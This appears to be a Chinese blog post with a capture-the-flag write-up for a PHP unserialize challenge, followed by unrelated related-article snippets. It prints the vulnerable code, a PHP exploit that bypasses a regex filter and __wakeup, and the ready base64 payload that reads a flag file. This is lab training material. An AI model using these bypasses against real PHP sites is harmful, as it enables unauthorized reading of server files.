90,【6】攻防世界 WEB Web_php_unserialize

進入靶場

進入靶場

<?php 
// 定義一個名為 Demo 的類
class Demo { // 定義一個私有屬性 $file,默認值為 'index.php'private $file = 'index.php';// 構造函數,當創建類的實例時會自動調用// 接收一個參數 $file,用于初始化對象的 $file 屬性public function __construct($file) { $this->file = $file; }// 析構函數,當對象被銷毀時自動調用// 使用 highlight_file 函數以高亮語法顯示 $this->file 指定的文件內容// @ 符號用于抑制可能出現的錯誤信息// true 參數表示將高亮顯示的內容作為字符串返回,而不是直接輸出function __destruct() { echo @highlight_file($this->file, true); }// __wakeup 魔術方法,當對象被反序列化時自動調用// 該方法用于檢查反序列化后的 $this->file 屬性值// 如果 $this->file 不等于 'index.php',則將其重置為 'index.php'// 注釋中提示秘密在 fl4g.php 文件中function __wakeup() { if ($this->file != 'index.php') { //the secret is in the fl4g.php$this->file = 'index.php'; } } 
}
// 檢查是否通過 GET 請求傳遞了名為 'var' 的參數
if (isset($_GET['var'])) { // 如果存在 'var' 參數,對其進行 Base64 解碼$var = base64_decode($_GET['var']); // 使用正則表達式檢查解碼后的字符串中是否包含特定格式的字符串// /[oc]:\d+:/i 用于匹配以 'o' 或 'c' 開頭,后面跟著一個冒號,再跟著一個或多個數字,最后再跟著一個冒號的字符串// i 修飾符表示不區分大小寫if (preg_match('/[oc]:\d+:/i', $var)) { // 如果匹配到,則輸出 'stop hacking!' 并終止腳本執行die('stop hacking!'); } else {// 如果沒有匹配到,則嘗試對解碼后的字符串進行反序列化// @ 符號用于抑制可能出現的錯誤信息@unserialize($var); } 
} else { // 如果沒有傳遞 'var' 參數,則以高亮語法顯示當前文件(index.php)的內容highlight_file("index.php"); 
} 
?>

我們要繞過unserialize函數、preg—match函數、wakeup函數、解碼函數

考點分析

  • PHP 反序列化:理解 PHP 對象的序列化和反序列化機制,以及如何利用反序列化過程中調用的魔術方法(如?__destruct__wakeup)來執行特定操作。
  • 正則過濾繞過:代碼中使用正則表達式?/[oc]:\d+:/i?對輸入進行過濾,需要思考如何繞過這個過濾機制。
  • 文件包含:通過控制?$file?屬性的值,利用?highlight_file?函數讀取目標文件內容。

解題思路

  1. 構造序列化對象:創建一個?Demo?類的對象,并將?$file?屬性設置為目標文件(如?fl4g.php),然后對該對象進行序列化。
  2. 繞過?__wakeup?方法__wakeup?方法會在反序列化時將?$file?屬性重置為?index.php,需要找到繞過該方法的方法。
  3. 繞過正則過濾:輸入的序列化字符串不能包含正則表達式?/[oc]:\d+:/i?匹配的內容。
  4. Base64 編碼:將處理后的序列化字符串進行 Base64 編碼,作為?var?參數傳遞給腳本。

php在線運行,在線工具,在線編譯IDE_w3cschool

?

<?php
// 定義一個名為 Demo 的類
class Demo { // 定義一個私有屬性 $file,初始值為 'fl4g.php',此文件可能包含我們要找的 flag 信息private $file = 'fl4g.php';
}// 創建一個 Demo 類的實例,并對該實例進行序列化操作
// 序列化是將對象轉換為一個字符串,以便于存儲或傳輸
$a = serialize(new Demo);// 原代碼中的正則表達式 /[oc]:\d+:/i 會匹配以 'o' 或 'c' 開頭,后跟冒號、一個或多個數字,再跟冒號的字符串
// 這里將序列化字符串中的 'O:4' 替換為 'O:+4',是為了繞過 preg_match() 函數的正則匹配
// 因為替換后的字符串不再符合正則表達式的匹配規則,從而避免被檢測為惡意輸入
$a = str_replace('O:4', 'O:+4',$a);// 在 PHP 反序列化時,如果對象的屬性個數與序列化字符串中聲明的屬性個數不一致
// 且序列化字符串中聲明的屬性個數大于實際屬性個數時,__wakeup() 魔術方法將不會被調用
// Demo 類實際只有一個屬性,這里將序列化字符串中的 ':1:'(表示有 1 個屬性)替換為 ':2:'
// 以此繞過 __wakeup() 方法,防止其將 $file 屬性重置為 'index.php'
$a = str_replace(':1:', ':2:',$a);// 最后對處理后的序列化字符串進行 Base64 編碼
// 因為原題目代碼會對傳入的 'var' 參數進行 Base64 解碼操作
// 這樣編碼后得到的字符串可以作為 'var' 參數的值傳遞給原題目代碼進行反序列化操作
echo base64_encode($a);
?>

?

TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

筆記?

需要對序列化十分熟悉

?

?

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/web/67845.shtml
繁體地址,請注明出處:http://hk.pswp.cn/web/67845.shtml
英文地址,請注明出處:http://en.pswp.cn/web/67845.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

Jenkins安裝部署(以及常見報錯解決方案),jdk版本控制器sdkman

目錄 零、環境介紹 一、Jenkins安裝 1、插件安裝以及更換插件源 2、修改jenkins時區 二、sdkman安裝&#xff08;可選&#xff09; 1、sdkman常用方法 2、sdkman常用方法演示 2.1、查看可用的jdk 2.2、下載jdk并切換版本 三、jenkins報錯解決 1、下載sdkman后systemc…

大數據挖掘--兩個角度理解相似度計算理論

文章目錄 0 相似度計算可以轉換成什么問題1 集合相似度的應用1.1 集合相似度1.1文檔相似度1.2 協同過濾用戶-用戶協同過濾物品-物品協同過濾 1.2 文檔的shingling--將文檔表示成集合1.2.1 k-shingling1.2.2 基于停用詞的 shingling 1.3 最小哈希簽名1.4 局部敏感哈希算法&#…

關于貪心學習的文筆記錄

貪心&#xff0c;顧名思義就是越貪越好&#xff0c;越多越有易&#xff0c;他給我的感覺是&#xff0c;通常是求最大或最小問題&#xff0c;相比于動態規劃貪心讓人更加琢磨不透&#xff0c;不易看出方法&#xff0c;為此在這記錄我所見過的題型和思維方法&#xff0c;以便回頭…

c語言練習題【數據類型、遞歸、雙向鏈表快速排序】

練習1&#xff1a;數據類型 請寫出以下幾個數據的數據類型 整數 a a 的地址 存放a的數組 b 存放a的地址的數組 b的地址 c的地址 指向 printf 函數的指針 d 存放 d的數組 整數 a 的類型 數據類型是 int a 的地址 數據類型是 int*&#xff08;指向 int 類型的指針&#xff09; …

聯想拯救者Y9000P IRX8 2023 (82WK) 原廠Win11 家庭中文版系統 帶一鍵還原功能 安裝教程

安裝完重建winre一鍵還原功能&#xff0c;和電腦出廠時的系統狀態一模一樣。自動機型專用軟件&#xff0c;全部驅動&#xff0c;主題壁紙&#xff0c;自動激活&#xff0c;oem信息等。將電腦系統完全恢復到出廠時狀態。 支持機型 (MTM) : 82WK 系統版本&#xff1a;Windows 1…

搜索與圖論復習2最短路

單源最短路---所有邊權是正數(Dijkstra算法O(n^2)--稠密圖(鄰接矩陣)和堆優化的Dijkstra算法O(mlogn)--稀疏圖(鄰接表)) 或存在負邊權(Bellman-ford貝爾曼福特算法O(nm)和SPFA一般O(m) 最壞O(nm) ) 多源最短路---Floyd算法O(n^3) 一、迪杰斯特拉算法(Dijkstra)&#xff1a;1…

Unity GetLocalizedString()失效問題

問題&#xff1a; 在一個自定義類中調用GetLocalizedString()的方法&#xff0c;是無效的&#xff08;創建這個自定義類的腳本沒掛載到場景中&#xff09;。 解決方法: 將自定義類的GetLocalizedString()方法換個地方&#xff0c;換到在場景中掛載的一個腳本實例&#xff08;…

【建站】專欄目錄

建站專欄的想法有很多&#xff0c;想寫窮鬼如何快速低成本部署前后端項目讓用戶能訪問到&#xff0c;如何將網站收錄到百度&#xff0c;bing&#xff0c;google并優化seo讓搜索引擎搜索到網站&#xff0c;想寫如何把網站加入google廣告或者接入stripe信用卡首款平臺收款&#x…

深入解析“legit”的地道用法——從俚語到正式表達:Sam Altman用來形容DeepSeek: legit invigorating(真的令人振奮)

深入解析“legit”的地道用法——從俚語到正式表達 一、引言 在社交媒體、科技圈甚至日常對話中&#xff0c;我們經常會看到或聽到“legit”這個詞。比如最近 Sam Altman 在 X&#xff08;原 Twitter&#xff09;上發的一條帖子中寫道&#xff1a; we will obviously deliver …

Vue 圖片引用方式詳解:靜態資源與動態路徑訪問

目錄 前言1. 引用 public/ 目錄2. assets/ 目錄3. 遠程服務器4. Vue Router 動態訪問5. 總結6. 擴展&#xff08;圖片不顯示&#xff09; 前言 &#x1f91f; 找工作&#xff0c;來萬碼優才&#xff1a;&#x1f449; #小程序://萬碼優才/r6rqmzDaXpYkJZF 在 Vue 開發中&#x…

DeepSeek-R1 本地部署教程(超簡版)

文章目錄 一、DeepSeek相關網站二、DeepSeek-R1硬件要求三、本地部署DeepSeek-R11. 安裝Ollama1.1 Windows1.2 Linux1.3 macOS 2. 下載和運行DeepSeek模型3. 列出本地已下載的模型 四、Ollama命令大全五、常見問題解決附&#xff1a;DeepSeek模型資源 一、DeepSeek相關網站 官…

JVM運行時數據區域-附面試題

Java虛擬機在執行Java程序的過程中會把它所管理的內存劃分為若干個不同的數據區域。這些區域 有各自的用途&#xff0c;以及創建和銷毀的時間&#xff0c;有的區域隨著虛擬機進程的啟動而一直存在&#xff0c;有些區域則是 依賴用戶線程的啟動和結束而建立和銷毀。 1. 程序計…

什么是LPU?會打破全球算力市場格局嗎?

在生成式AI向垂直領域縱深發展的關鍵節點&#xff0c;一場靜默的芯片革命正在改寫算力規則。Groq研發的LPU&#xff08;Language Processing Unit&#xff09;憑借其顛覆性架構&#xff0c;不僅突破了傳統GPU的性能天花板&#xff0c;更通過與DeepSeek等國產大模型的深度協同&a…

如何構建ObjC語言編譯環境?構建無比簡潔的clang編譯ObjC環境?Windows搭建Swift語言編譯環境?

如何構建ObjC語言編譯環境? 除了在線ObjC編譯器&#xff0c;本地環境Windows/Mac/Linux均可以搭建ObjC編譯環境。 Mac自然不用多說&#xff0c;ObjC是親兒子。(WSL Ubuntu 22.04) Ubuntu可以安裝gobjc/gnustep和gnustep-devel構建編譯環境。 sudo apt-get install gobjc gnus…

2月3日星期一今日早報簡報微語報早讀

2月3日星期一&#xff0c;農歷正月初六&#xff0c;早報#微語早讀。 1、多個景區發布公告&#xff1a;售票數量已達上限&#xff0c;請游客合理安排行程&#xff1b; 2、2025春節檔總票房破70億&#xff0c;《哪吒之魔童鬧海》破31億&#xff1b; 3、美宣布對中國商品加征10…

DeepSeek 原理解析:與主流大模型的差異及低算力優勢

在人工智能大模型蓬勃發展的浪潮中&#xff0c;DeepSeek 以其獨特的技術路線和出色的性能表現脫穎而出。與主流大模型相比&#xff0c;DeepSeek 不僅在技術原理上有著顯著的差異&#xff0c;還展現出了在較低算力下達到 OpenAI API 水平的卓越能力。本文將深入剖析這些獨特之處…

C++ Primer 標準庫vector

歡迎閱讀我的 【CPrimer】專欄 專欄簡介&#xff1a;本專欄主要面向C初學者&#xff0c;解釋C的一些基本概念和基礎語言特性&#xff0c;涉及C標準庫的用法&#xff0c;面向對象特性&#xff0c;泛型特性高級用法。通過使用標準庫中定義的抽象設施&#xff0c;使你更加適應高級…

【Numpy核心編程攻略:Python數據處理、分析詳解與科學計算】2.6 廣播機制核心算法:維度擴展的數學建模

2.6 廣播機制核心算法&#xff1a;維度擴展的數學建模 目錄/提綱 #mermaid-svg-IfELXmhcsdH1tW69 {font-family:"trebuchet ms",verdana,arial,sans-serif;font-size:16px;fill:#333;}#mermaid-svg-IfELXmhcsdH1tW69 .error-icon{fill:#552222;}#mermaid-svg-IfELXm…

【Elasticsearch】硬件資源優化

&#x1f9d1; 博主簡介&#xff1a;CSDN博客專家&#xff0c;歷代文學網&#xff08;PC端可以訪問&#xff1a;https://literature.sinhy.com/#/?__c1000&#xff0c;移動端可微信小程序搜索“歷代文學”&#xff09;總架構師&#xff0c;15年工作經驗&#xff0c;精通Java編…

bootstrap.yml文件未自動加載問題解決方案

在添加bootstrap.yml文件后,程序未自動掃描到,即圖標是這樣的: 查了一些資料,是缺少bootstrap相關依賴,雖然已經添加了spring-cloud-context依賴,但是這個依賴并未引入bootstrap依賴,可能是版本問題,需要手動引入 <dependency><groupId>org.springframework.cloud&…